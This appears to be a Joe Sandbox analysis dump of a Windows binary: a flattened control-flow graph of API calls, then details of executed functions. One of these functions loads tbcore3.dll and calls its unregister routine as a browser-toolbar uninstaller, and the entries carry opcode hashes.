3210->3285 3214 f11bd 3292 f1cd3 GetModuleFileNameW 3214->3292 3217 f11d2 3298 f1aa4 3217->3298 3218 f1411 66 API calls 3218->3217 3221 f11e3 3311 f14d0 3221->3311 3223 f1411 66 API calls 3223->3221 3224 f11ea 3225 f1411 66 API calls 3224->3225 3226 f11f5 3224->3226 3225->3226 3317 f1000 CoInitialize CreateMutexW 3226->3317 3228 f1216 3229 f1224 3228->3229 3331 f1681 3228->3331 3349 f16ad 3229->3349 3232 f1229 3233->3198 3235 f1177 3234->3235 3235->3202 3334 f10db 3235->3334 3237 f24a9 3236->3237 3238 f24a2 3236->3238 3240 f24b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3237->3240 3241 f2611 3237->3241 3352 f13e1 3238->3352 3243 f24fc TlsAlloc 3240->3243 3411 f21a8 3241->3411 3246 f1189 3243->3246 3247 f254a TlsSetValue 3243->3247 3246->3206 3246->3207 3247->3246 3248 f255b 3247->3248 3356 f16cb 3248->3356 3253 f207e 6 API calls 3254 f257b 3253->3254 3255 f207e 6 API calls 3254->3255 3256 f258b 3255->3256 3257 f207e 6 API calls 3256->3257 3258 f259b 3257->3258 3373 f2924 3258->3373 3265 f20f9 6 API calls 3266 f25ef 3265->3266 3266->3241 3267 f25f6 3266->3267 3393 f21e5 3267->3393 3269 f25fe GetCurrentThreadId 3269->3246 3738 f264c 3270->3738 3272 f1dea GetStartupInfoA 3273 f3730 66 API calls 3272->3273 3280 f1e0b 3273->3280 3274 f2029 3274->3209 3275 f1fa6 GetStdHandle 3279 f1f70 3275->3279 3276 f200b SetHandleCount 3276->3274 3277 f3730 66 API calls 3277->3280 3278 f1fb8 GetFileType 3278->3279 3279->3274 3279->3275 3279->3276 3279->3278 3283 f317c InitializeCriticalSectionAndSpinCount 3279->3283 3280->3274 3280->3277 3280->3279 3282 f1ef3 3280->3282 3281 f1f1c GetFileType 3281->3282 3282->3274 3282->3279 3282->3281 3284 f317c InitializeCriticalSectionAndSpinCount 3282->3284 3283->3279 3284->3282 3286 f1d96 3285->3286 3287 f1d92 3285->3287 3289 f36eb 66 API calls 3286->3289 3287->3214 3290 f1db7 3289->3290 3291 f1dbe FreeEnvironmentStringsW 3290->3291 3291->3214 3293 f1d08 3292->3293 3294 f11c7 3293->3294 3295 f1d45 3293->3295 3294->3217 3294->3218 3296 f36eb 66 API calls 3295->3296 3297 f1d4b 3296->3297 3297->3294 3299 f1abc 3298->3299 3303 f11d8 3298->3303 3300 f3730 66 API calls 3299->3300 3306 f1ae0 3300->3306 3301 f1b45 3302 f35ee 66 API calls 3301->3302 3302->3303 3303->3221 3303->3223 3304 f3730 66 API calls 3304->3306 3305 f1b6b 3307 f35ee 66 API calls 3305->3307 3306->3301 3306->3303 3306->3304 3306->3305 3309 f1b2a 3306->3309 3739 f367c 3306->3739 3307->3303 3309->3306 3310 f2ae2 10 API calls 3309->3310 3310->3309 3313 f14de 3311->3313 3748 f2dc3 3313->3748 3314 f14fc 3316 f151b 3314->3316 3752 f2dac 3314->3752 3316->3224 3318 f101f GetLastError 3317->3318 3319 f1035 GetCommandLineW CommandLineToArgvW 3317->3319 3318->3319 3322 f102c 3318->3322 3320 f1056 PathFileExistsW 3319->3320 3321 f1067 3319->3321 3320->3321 3323 f106e PathFileExistsW 3320->3323 3324 f1084 LoadLibraryW 3321->3324 3322->3228 3323->3321 3323->3324 3325 f10aa CloseHandle CoUninitialize 3324->3325 3326 f1091 GetProcAddress 3324->3326 3329 f10bb LocalFree 3325->3329 3330 f10c2 3325->3330 3327 f10a3 FreeLibrary 3326->3327 3328 f10a1 3326->3328 3327->3325 3328->3327 3329->3330 3330->3228 3852 f1555 3331->3852 3333 f1692 3333->3229 3335 f10ee 3334->3335 3336 f10e9 3334->3336 3338 f1719 66 API calls 3335->3338 3337 f18c4 66 API calls 3336->3337 3337->3335 3339 f10f6 3338->3339 3340 f1465 3 API calls 3339->3340 3341 f1100 3340->3341 3341->3202 3343 f18c4 66 API calls 3342->3343 3344 f141b 3343->3344 3345 f1719 66 API calls 3344->3345 3346 f1423 3345->3346 3347 f20f9 6 API calls 3346->3347 3348 f11ad 3347->3348 3348->3210 3350 f1555 66 API calls 3349->3350 3351 f16b8 3350->3351 3351->3232 3353 f13ec Sleep GetModuleHandleW 3352->3353 3354 f140e 3353->3354 3355 f140a 3353->3355 3354->3237 3355->3353 3355->3354 3422 f20f0 3356->3422 3358 f16d3 3425 f2913 3358->3425 3361 f207e 6 API calls 3362 f170f 3361->3362 3363 f207e TlsGetValue 3362->3363 3364 f20b7 GetModuleHandleW 3363->3364 3365 f2096 3363->3365 3367 f20c7 3364->3367 3368 f20d2 GetProcAddress 3364->3368 3365->3364 3366 f20a0 TlsGetValue 3365->3366 3370 f20ab 3366->3370 3369 f13e1 2 API calls 3367->3369 3372 f20af 3368->3372 3371 f20cd 3369->3371 3370->3364 3370->3372 3371->3368 3371->3372 3372->3253 3374 f292f 3373->3374 3376 f25a8 3374->3376 3428 f317c 3374->3428 3376->3241 3377 f20f9 TlsGetValue 3376->3377 3378 f2132 GetModuleHandleW 3377->3378 3379 f2111 3377->3379 3381 f214d GetProcAddress 3378->3381 3382 f2142 3378->3382 3379->3378 3380 f211b TlsGetValue 3379->3380 3386 f2126 3380->3386 3383 f212a 3381->3383 3384 f13e1 2 API calls 3382->3384 3383->3241 3387 f3730 3383->3387 3385 f2148 3384->3385 3385->3381 3385->3383 3386->3378 3386->3383 3389 f3739 3387->3389 3390 f25d5 3389->3390 3391 f3757 Sleep 3389->3391 3433 f557f 3389->3433 3390->3241 3390->3265 3392 f376c 3391->3392 3392->3389 3392->3390 3717 f264c 3393->3717 3395 f21f1 GetModuleHandleW 3396 f2201 3395->3396 3401 f2207 3395->3401 3397 f13e1 2 API calls 3396->3397 3397->3401 3398 f221f GetProcAddress GetProcAddress 3399 f2243 3398->3399 3400 f2aa0 62 API calls 3399->3400 3402 f2262 InterlockedIncrement 3400->3402 3401->3398 3401->3399 3718 f22ba 3402->3718 3405 f2aa0 62 API calls 3406 f2283 3405->3406 3721 f3c9e InterlockedIncrement 3406->3721 3408 f22a1 3733 f22c3 3408->3733 3410 f22ae 3410->3269 3412 f21be 3411->3412 3413 f21b2 3411->3413 3414 f21d2 TlsFree 3412->3414 3416 f21e0 3412->3416 3415 f20f9 6 API calls 3413->3415 3414->3416 3415->3412 3417 f298b DeleteCriticalSection 3416->3417 3418 f29a3 3416->3418 3419 f35ee 66 API calls 3417->3419 3420 f29c3 3418->3420 3421 f29b5 DeleteCriticalSection 3418->3421 3419->3416 3420->3246 3421->3418 3423 f207e 6 API calls 3422->3423 3424 f20f7 3423->3424 3424->3358 3426 f207e 6 API calls 3425->3426 3427 f1705 3426->3427 3427->3361 3432 f264c 3428->3432 3430 f3188 InitializeCriticalSectionAndSpinCount 3431 f31cc 3430->3431 3431->3374 3432->3430 3434 f558b 3433->3434 3435 f55a3 3434->3435 3445 f55c2 3434->3445 3446 f2c72 3435->3446 3439 f5634 HeapAlloc 3439->3445 3441 f55b8 3441->3389 3445->3439 3445->3441 3452 f2aa0 3445->3452 3459 f4dc3 3445->3459 3465 f567b 3445->3465 3468 f31eb 3445->3468 3471 f22cc GetLastError 3446->3471 3448 f2c77 3449 f2c0a 3448->3449 3450 f20f9 6 API calls 3449->3450 3451 f2c1a 3450->3451 3453 f2ac8 EnterCriticalSection 3452->3453 3454 f2ab5 3452->3454 3453->3445 3513 f29dd 3454->3513 3456 f2abb 3456->3453 3457 f1411 65 API calls 3456->3457 3458 f2ac7 3457->3458 3458->3453 3461 f4df1 3459->3461 3460 f4e93 3460->3445 3461->3460 3462 f4e8a 3461->3462 3705 f492a 3461->3705 3462->3460 3712 f49da 3462->3712 3716 f29c6 LeaveCriticalSection 3465->3716 3467 f5682 3467->3445 3469 f20f9 6 API calls 3468->3469 3470 f31fb 3469->3470 3470->3445 3485 f2174 TlsGetValue 3471->3485 3474 f2339 SetLastError 3474->3448 3475 f3730 63 API calls 3476 f22f7 3475->3476 3476->3474 3477 f20f9 6 API calls 3476->3477 3478 f2311 3477->3478 3479 f2318 3478->3479 3480 f2330 3478->3480 3481 f21e5 63 API calls 3479->3481 3490 f35ee 3480->3490 3483 f2320 GetCurrentThreadId 3481->3483 3483->3474 3484 f2336 3484->3474 3486 f2189 3485->3486 3487 f21a4 3485->3487 3488 f20f9 6 API calls 3486->3488 3487->3474 3487->3475 3489 f2194 TlsSetValue 3488->3489 3489->3487 3492 f35fa 3490->3492 3491 f3639 3493 f3673 3491->3493 3494 f364e HeapFree 3491->3494 3492->3491 3492->3493 3495 f2aa0 64 API calls 3492->3495 3493->3484 3494->3493 3496 f3660 3494->3496 3497 f3611 3495->3497 3498 f2c72 64 API calls 3496->3498 3500 f362b 3497->3500 3503 f4614 3497->3503 3499 f3665 GetLastError 3498->3499 3499->3493 3509 f3644 3500->3509 3504 f4653 3503->3504 3508 f48f5 3503->3508 3505 f483f VirtualFree 3504->3505 3504->3508 3506 f48a3 3505->3506 3507 f48b2 VirtualFree HeapFree 3506->3507 3506->3508 3507->3508 3508->3500 3512 f29c6 LeaveCriticalSection 3509->3512 3511 f364b 3511->3491 3512->3511 3514 f29e9 3513->3514 3515 f2a0f 3514->3515 3539 f18c4 3514->3539 3523 f2a1f 3515->3523 3585 f36eb 3515->3585 3521 f2a31 3525 f2c72 66 API calls 3521->3525 3522 f2a40 3526 f2aa0 66 API calls 3522->3526 3523->3456 3525->3523 3528 f2a47 3526->3528 3529 f2a4f 3528->3529 3530 f2a7b 3528->3530 3532 f317c InitializeCriticalSectionAndSpinCount 3529->3532 3531 f35ee 66 API calls 3530->3531 3533 f2a6c 3531->3533 3534 f2a5a 3532->3534 3590 f2a97 3533->3590 3534->3533 3536 f35ee 66 API calls 3534->3536 3537 f2a66 3536->3537 3538 f2c72 66 API calls 3537->3538 3538->3533 3593 f35a3 3539->3593 3542 f35a3 66 API calls 3544 f18d8 3542->3544 3543 f1719 66 API calls 3545 f18f0 3543->3545 3544->3543 3546 f18fa 3544->3546 3547 f1719 66 API calls 3545->3547 3548 f1719 3546->3548 3547->3546 3549 f172d 3548->3549 3550 f35a3 63 API calls 3549->3550 3581 f1888 3549->3581 3551 f174f 3550->3551 3552 f188d GetStdHandle 3551->3552 3554 f35a3 63 API calls 3551->3554 3553 f189b 3552->3553 3552->3581 3557 f18b4 WriteFile 3553->3557 3553->3581 3555 f1760 3554->3555 3555->3552 3556 f1772 3555->3556 3556->3581 3599 f353b 3556->3599 3557->3581 3560 f17a8 GetModuleFileNameA 3562 f17c6 3560->3562 3566 f17e9 3560->3566 3564 f353b 63 API calls 3562->3564 3565 f17d6 3564->3565 3565->3566 3568 f2ae2 10 API calls 3565->3568 3567 f182c 3566->3567 3615 f33f0 3566->3615 3624 f337c 3567->3624 3568->3566 3573 f1850 3575 f337c 63 API calls 3573->3575 3574 f2ae2 10 API calls 3574->3573 3577 f1864 3575->3577 3576 f2ae2 10 API calls 3576->3567 3578 f1875 3577->3578 3579 f2ae2 10 API calls 3577->3579 3633 f3213 3578->3633 3579->3578 3582 f1465 3581->3582 3671 f143a GetModuleHandleW 3582->3671 3588 f36f4 3585->3588 3587 f2a2a 3587->3521 3587->3522 3588->3587 3589 f370b Sleep 3588->3589 3675 f54b5 3588->3675 3589->3588 3704 f29c6 LeaveCriticalSection 3590->3704 3592 f2a9e 3592->3523 3594 f35b2 3593->3594 3595 f18cb 3594->3595 3596 f2c72 66 API calls 3594->3596 3595->3542 3595->3544 3597 f35d5 3596->3597 3598 f2c0a 6 API calls 3597->3598 3598->3595 3600 f354c 3599->3600 3601 f3553 3599->3601 3600->3601 3606 f3579 3600->3606 3602 f2c72 66 API calls 3601->3602 3603 f3558 3602->3603 3604 f2c0a 6 API calls 3603->3604 3605 f1794 3604->3605 3605->3560 3608 f2ae2 3605->3608 3606->3605 3607 f2c72 66 API calls 3606->3607 3607->3603 3660 f5320 3608->3660 3610 f2b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3611 f2bdf 3610->3611 3612 f2beb GetCurrentProcess TerminateProcess 3610->3612 3611->3612 3662 f10cc 3612->3662 3614 f17a5 3614->3560 3619 f3402 3615->3619 3616 f3406 3617 f2c72 66 API calls 3616->3617 3618 f1819 3616->3618 3623 f3422 3617->3623 3618->3567 3618->3576 3619->3616 3619->3618 3621 f344c 3619->3621 3620 f2c0a 6 API calls 3620->3618 3621->3618 3622 f2c72 66 API calls 3621->3622 3622->3623 3623->3620 3625 f3394 3624->3625 3628 f338d 3624->3628 3626 f2c72 66 API calls 3625->3626 3627 f3399 3626->3627 3629 f2c0a 6 API calls 3627->3629 3628->3625 3630 f33c8 3628->3630 3631 f183f 3629->3631 3630->3631 3632 f2c72 66 API calls 3630->3632 3631->3573 3631->3574 3632->3627 3634 f20f0 6 API calls 3633->3634 3635 f3223 3634->3635 3636 f3236 LoadLibraryA 3635->3636 3637 f32be 3635->3637 3638 f324b GetProcAddress 3636->3638 3639 f3360 3636->3639 3644 f20f9 6 API calls 3637->3644 3656 f32e8 3637->3656 3638->3639 3641 f3261 3638->3641 3639->3581 3640 f3313 3642 f20f9 6 API calls 3640->3642 3645 f207e 6 API calls 3641->3645 3642->3639 3643 f20f9 6 API calls 3653 f332b 3643->3653 3646 f32db 3644->3646 3647 f3267 GetProcAddress 3645->3647 3648 f20f9 6 API calls 3646->3648 3649 f207e 6 API calls 3647->3649 3648->3656 3650 f327c GetProcAddress 3649->3650 3651 f207e 6 API calls 3650->3651 3652 f3291 GetProcAddress 3651->3652 3654 f207e 6 API calls 3652->3654 3653->3640 3655 f20f9 6 API calls 3653->3655 3657 f32a6 3654->3657 3655->3640 3656->3640 3656->3643 3657->3637 3658 f32b0 GetProcAddress 3657->3658 3659 f207e 6 API calls 3658->3659 3659->3637 3661 f532c 3660->3661 3661->3610 3661->3661 3663 f10d6 IsDebuggerPresent 3662->3663 3664 f10d4 3662->3664 3670 f28d2 3663->3670 3664->3614 3667 f1358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3668 f137d GetCurrentProcess TerminateProcess 3667->3668 3669 f1375 3667->3669 3668->3614 3669->3668 3670->3667 3672 f144e GetProcAddress 3671->3672 3673 f1463 ExitProcess 3671->3673 3672->3673 3674 f145e 3672->3674 3674->3673 3676 f5568 3675->3676 3685 f54c7 3675->3685 3677 f31eb 6 API calls 3676->3677 3678 f556e 3677->3678 3680 f2c72 65 API calls 3678->3680 3679 f18c4 65 API calls 3679->3685 3691 f5560 3680->3691 3682 f1719 65 API calls 3682->3685 3683 f5524 HeapAlloc 3683->3685 3684 f1465 3 API calls 3684->3685 3685->3679 3685->3682 3685->3683 3685->3684 3686 f5554 3685->3686 3687 f31eb 6 API calls 3685->3687 3689 f5559 3685->3689 3685->3691 3692 f5466 3685->3692 3688 f2c72 65 API calls 3686->3688 3687->3685 3688->3689 3690 f2c72 65 API calls 3689->3690 3690->3691 3691->3588 3693 f5472 3692->3693 3694 f2aa0 66 API calls 3693->3694 3696 f54a3 3693->3696 3695 f5488 3694->3695 3697 f4dc3 5 API calls 3695->3697 3696->3685 3698 f5493 3697->3698 3700 f54ac 3698->3700 3703 f29c6 LeaveCriticalSection 3700->3703 3702 f54b3 3702->3696 3703->3702 3704->3592 3706 f493d HeapReAlloc 3705->3706 3707 f4971 HeapAlloc 3705->3707 3708 f495f 3706->3708 3709 f495b 3706->3709 3707->3709 3710 f4994 VirtualAlloc 3707->3710 3708->3707 3709->3462 3710->3709 3711 f49ae HeapFree 3710->3711 3711->3709 3713 f49f1 VirtualAlloc 3712->3713 3715 f4a38 3713->3715 3715->3460 3716->3467 3717->3395 3736 f29c6 LeaveCriticalSection 3718->3736 3720 f227c 3720->3405 3722 f3cbf 3721->3722 3723 f3cbc InterlockedIncrement 3721->3723 3724 f3ccc 3722->3724 3725 f3cc9 InterlockedIncrement 3722->3725 3723->3722 3726 f3cd9 3724->3726 3727 f3cd6 InterlockedIncrement 3724->3727 3725->3724 3728 f3ce3 InterlockedIncrement 3726->3728 3730 f3ce6 3726->3730 3727->3726 3728->3730 3729 f3cff InterlockedIncrement 3729->3730 3730->3729 3731 f3d0f InterlockedIncrement 3730->3731 3732 f3d1a InterlockedIncrement 3730->3732 3731->3730 3732->3408 3737 f29c6 LeaveCriticalSection 3733->3737 3735 f22ca 3735->3410 3736->3720 3737->3735 3738->3272 3740 f368d 3739->3740 3741 f3694 3739->3741 3740->3741 3743 f36c0 3740->3743 3742 f2c72 66 API calls 3741->3742 3747 f3699 3742->3747 3745 f36a8 3743->3745 3746 f2c72 66 API calls 3743->3746 3744 f2c0a 6 API calls 3744->3745 3745->3306 3746->3747 3747->3744 3749 f2dc9 3748->3749 3750 f207e 6 API calls 3749->3750 3751 f2de1 3749->3751 3750->3749 3751->3314 3755 f2d70 3752->3755 3754 f2db9 3754->3316 3756 f2d7c 3755->3756 3763 f147d 3756->3763 3762 f2d9d 3762->3754 3764 f2aa0 66 API calls 3763->3764 3765 f1484 3764->3765 3766 f2c85 3765->3766 3767 f20f9 6 API calls 3766->3767 3768 f2c99 3767->3768 3769 f20f9 6 API calls 3768->3769 3770 f2ca9 3769->3770 3771 f2d2c 3770->3771 3786 f539a 3770->3786 3783 f2da6 3771->3783 3773 f2d13 3774 f207e 6 API calls 3773->3774 3775 f2d21 3774->3775 3778 f207e 6 API calls 3775->3778 3776 f2cc7 3776->3773 3777 f2ceb 3776->3777 3799 f377c 3776->3799 3777->3771 3780 f377c 72 API calls 3777->3780 3781 f2d01 3777->3781 3778->3771 3780->3781 3781->3771 3782 f207e 6 API calls 3781->3782 3782->3773 3848 f1486 3783->3848 3787 f53a6 3786->3787 3788 f53b6 3787->3788 3789 f53d3 3787->3789 3790 f2c72 66 API calls 3788->3790 3791 f5414 HeapSize 3789->3791 3793 f2aa0 66 API calls 3789->3793 3792 f53bb 3790->3792 3795 f53cb 3791->3795 3794 f2c0a 6 API calls 3792->3794 3796 f53e3 3793->3796 3794->3795 3795->3776 3804 f5434 3796->3804 3803 f3785 3799->3803 3801 f37c4 3801->3777 3802 f37a5 Sleep 3802->3803 3803->3801 3803->3802 3808 f569d 3803->3808 3807 f29c6 LeaveCriticalSection 3804->3807 3806 f540f 3806->3791 3806->3795 3807->3806 3809 f56a9 3808->3809 3810 f56be 3809->3810 3811 f56b0 3809->3811 3813 f56c5 3810->3813 3814 f56d1 3810->3814 3812 f54b5 66 API calls 3811->3812 3835 f56b8 3812->3835 3815 f35ee 66 API calls 3813->3815 3825 f5843 3814->3825 3842 f56de 3814->3842 3815->3835 3816 f5876 3819 f31eb 6 API calls 3816->3819 3817 f5848 HeapReAlloc 3817->3825 3817->3835 3818 f2aa0 66 API calls 3818->3842 3820 f587c 3819->3820 3822 f2c72 66 API calls 3820->3822 3821 f589a 3824 f2c72 66 API calls 3821->3824 3821->3835 3822->3835 3823 f31eb 6 API calls 3823->3825 3826 f58a3 GetLastError 3824->3826 3825->3816 3825->3817 3825->3821 3825->3823 3827 f5890 3825->3827 3826->3835 3829 f2c72 66 API calls 3827->3829 3831 f5811 3829->3831 3830 f5769 HeapAlloc 3830->3842 3833 f5816 GetLastError 3831->3833 3831->3835 3832 f57be HeapReAlloc 3832->3842 3833->3835 3834 f4dc3 5 API calls 3834->3842 3835->3803 3836 f5829 3836->3835 3838 f2c72 66 API calls 3836->3838 3837 f31eb 6 API calls 3837->3842 3839 f5836 3838->3839 3839->3826 3839->3835 3840 f580c 3841 f2c72 66 API calls 3840->3841 3841->3831 3842->3816 3842->3818 3842->3830 3842->3832 3842->3834 3842->3835 3842->3836 3842->3837 3842->3840 3843 f4614 VirtualFree VirtualFree HeapFree 3842->3843 3844 f57e1 3842->3844 3843->3842 3847 f29c6 LeaveCriticalSection 3844->3847 3846 f57e8 3846->3842 3847->3846 3851 f29c6 LeaveCriticalSection 3848->3851 3850 f148d 3850->3762 3851->3850 3853 f1561 3852->3853 3854 f2aa0 66 API calls 3853->3854 3855 f1568 3854->3855 3856 f1631 3855->3856 3857 f1594 3855->3857 3871 f166c 3856->3871 3859 f20f9 6 API calls 3857->3859 3861 f159f 3859->3861 3862 f1621 3861->3862 3865 f20f9 6 API calls 3861->3865 3862->3856 3864 f1669 3864->3333 3870 f15b4 3865->3870 3866 f1660 3867 f1465 3 API calls 3866->3867 3867->3864 3868 f20f9 6 API calls 3868->3870 3869 f20f0 6 API calls 3869->3870 3870->3862 3870->3868 3870->3869 3872 f164d 3871->3872 3873 f1672 3871->3873 3872->3864 3875 f29c6 LeaveCriticalSection 3872->3875 3876 f29c6 LeaveCriticalSection 3873->3876 3875->3866 3876->3872 4369 f1242 4370 f1257 4369->4370 4371 f1251 4369->4371 4375 f16bc 4370->4375 4372 f1697 66 API calls 4371->4372 4372->4370 4374 f125c 4376 f1555 66 API calls 4375->4376 4377 f16c7 4376->4377 4377->4374 3881 f1281 3884 f283c 3881->3884 3883 f1286 3883->3883 3885 f286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3884->3885 3886 f2861 3884->3886 3887 f2865 3885->3887 3886->3885 3886->3887 3887->3883 3953 f2d3f 3954 f3730 66 API calls 3953->3954 3955 f2d4b 3954->3955 3956 f207e 6 API calls 3955->3956 3957 f2d53 3956->3957 4378 f235f 4379 f236b 4378->4379 4380 f2383 4379->4380 4381 f35ee 66 API calls 4379->4381 4383 f246d 4379->4383 4382 f2391 4380->4382 4384 f35ee 66 API calls 4380->4384 4381->4380 4385 f239f 4382->4385 4387 f35ee 66 API calls 4382->4387 4384->4382 4386 f23ad 4385->4386 4388 f35ee 66 API calls 4385->4388 4389 f23bb 4386->4389 4390 f35ee 66 API calls 4386->4390 4387->4385 4388->4386 4391 f35ee 66 API calls 4389->4391 4393 f23c9 4389->4393 4390->4389 4391->4393 4392 f23d7 4394 f23e8 4392->4394 4396 f35ee 66 API calls 4392->4396 4393->4392 4395 f35ee 66 API calls 4393->4395 4397 f2aa0 66 API calls 4394->4397 4395->4392 4396->4394 4398 f23f0 4397->4398 4399 f23fc InterlockedDecrement 4398->4399 4400 f2415 4398->4400 4399->4400 4401 f2407 4399->4401 4414 f2479 4400->4414 4401->4400 4404 f35ee 66 API calls 4401->4404 4404->4400 4405 f2aa0 66 API calls 4406 f2429 4405->4406 4407 f245a 4406->4407 4408 f3d2d 8 API calls 4406->4408 4417 f2485 4407->4417 4412 f243e 4408->4412 4411 f35ee 66 API calls 4411->4383 4412->4407 4413 f3b55 66 API calls 4412->4413 4413->4407 4420 f29c6 LeaveCriticalSection 4414->4420 4416 f2422 4416->4405 4421 f29c6 LeaveCriticalSection 4417->4421 4419 f2467 4419->4411 4420->4416 4421->4419 4426 f28fe 4427 f2901 4426->4427 4428 f51fb 68 API calls 4427->4428 4429 f290d 4428->4429 3958 f543d 3959 f1411 66 API calls 3958->3959 3960 f5444 3959->3960 3961 f5138 3962 f514a 3961->3962 3964 f5158 3961->3964 3963 f10cc 5 API calls 3962->3963 3963->3964 3965 f31b4 3966 f31c0 SetLastError 3965->3966 3967 f31c8 3965->3967 3966->3967 3888 f1391 3889 f13cd 3888->3889 3890 f13a3 3888->3890 3890->3889 3892 f28da 3890->3892 3893 f28e6 3892->3893 3898 f2345 3893->3898 3899 f22cc 66 API calls 3898->3899 3900 f234d 3899->3900 3901 f1411 66 API calls 3900->3901 3902 f235a 3900->3902 3901->3902 3903 f51fb 3902->3903 3904 f521a 3903->3904 3905 f5221 3903->3905 3906 f1719 66 API calls 3904->3906 3915 f2f92 3905->3915 3906->3905 3909 f5232 3911 f530a 3909->3911 3913 f52ca SetUnhandledExceptionFilter UnhandledExceptionFilter 3909->3913 3939 f1697 3911->3939 3913->3911 3916 f20f9 6 API calls 3915->3916 3917 f2f9d 3916->3917 3917->3909 3918 f2f9f 3917->3918 3923 f2fab 3918->3923 3919 f3007 3920 f2fe8 3919->3920 3925 f3016 3919->3925 3924 f20f9 6 API calls 3920->3924 3921 f2fd2 3922 f22cc 66 API calls 3921->3922 3927 f2fd7 3922->3927 3923->3919 3923->3920 3923->3921 3926 f2fce 3923->3926 3924->3927 3928 f2c72 66 API calls 3925->3928 3926->3921 3926->3925 3931 f307d 3927->3931 3932 f1697 66 API calls 3927->3932 3938 f2fe0 3927->3938 3929 f301b 3928->3929 3930 f2c0a 6 API calls 3929->3930 3930->3938 3933 f2aa0 66 API calls 3931->3933 3934 f3088 3931->3934 3932->3931 3933->3934 3935 f20f0 6 API calls 3934->3935 3936 f30bd 3934->3936 3935->3936 3942 f3113 3936->3942 3938->3909 3940 f1555 66 API calls 3939->3940 3941 f16a8 3940->3941 3943 f3119 3942->3943 3944 f3120 3942->3944 3946 f29c6 LeaveCriticalSection 3943->3946 3944->3938 3946->3944 3968 f26b0 3969 f26dc 3968->3969 3970 f26e9 3968->3970 3971 f10cc 5 API calls 3969->3971 3972 f10cc 5 API calls 3970->3972 3971->3970 3980 f26f9 3972->3980 3973 f277c 3974 f276c 3976 f10cc 5 API calls 3974->3976 3975 f10cc 5 API calls 3975->3974 3976->3973 3978 f27cb 3979 f27ff 3978->3979 3981 f10cc 5 API calls 3978->3981 3982 f10cc 5 API calls 3979->3982 3980->3973 3983 f2752 3980->3983 3984 f51ca RtlUnwind 3980->3984 3981->3979 3982->3983 3983->3973 3983->3974 3983->3975 3984->3978

                                                                          Executed Functions

                                                                          Function 000F1000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73libraryloadersynchronizationCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 000F1006
                                                                          • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 000F1013
                                                                          • GetLastError.KERNEL32 ref: 000F101F
                                                                          • GetCommandLineW.KERNEL32(?), ref: 000F1040
                                                                          • CommandLineToArgvW.SHELL32(00000000), ref: 000F1047
                                                                          • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 000F1061
                                                                          • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 000F1073
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 000F1085
                                                                          • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 000F1097
                                                                          • FreeLibrary.KERNELBASE(00000000), ref: 000F10A4
                                                                          • CloseHandle.KERNELBASE(00000000), ref: 000F10AB
                                                                          • CoUninitialize.COMBASE ref: 000F10B1
                                                                          • LocalFree.KERNEL32(00000000), ref: 000F10BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                                          • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
                                                                          • API String ID: 474438367-4110843154
                                                                          • Opcode ID: 57594a3f8a6e5fd7049e1d3f8ae3ab2e0fe37b66c5106b45bc40fa3059a18ada
                                                                          • Instruction ID: 622c9a35e0958bb35736793f91ff9a1fbc81ee052e185e05f8e0d121ab74457c
                                                                          • Opcode Fuzzy Hash: 57594a3f8a6e5fd7049e1d3f8ae3ab2e0fe37b66c5106b45bc40fa3059a18ada
                                                                          • Instruction Fuzzy Hash: 7011E132605659EBA3A0AB60AC0CAFF379CFF547617008525F742D2C50CFA98945FBB2
                                                                          Function 000F1104 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetStartupInfoW.KERNEL32(?,000F93F0,00000058), ref: 000F1119
                                                                          • GetCommandLineW.KERNEL32 ref: 000F11AE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.37255374796.00000000000F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000F0000, based on PE: true
                                                                          • Associated: 00000027.00000002.37255329444.00000000000F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255466487.00000000000FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                          • Associated: 00000027.00000002.37255506698.00000000000FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_f0000_I0JA3xg.jbxd
                                                                          Similarity
                                                                          • API ID: CommandInfoLineStartup
                                                                          • String ID: .$
                                                                          • API String ID: 582193876-2223841709
                                                                          • Opcode ID: 227a265cc030ef57311a9a0984716e123e8ef617fa50b14fc018453cdcc80c07
                                                                          • Instruction ID: a832987b1d3b0597ebf3e54e9e1d4732754ca14d6500a66b43343c9389033f71
                                                                          • Opcode Fuzzy Hash: 227a265cc030ef57311a9a0984716e123e8ef617fa50b14fc018453cdcc80c07
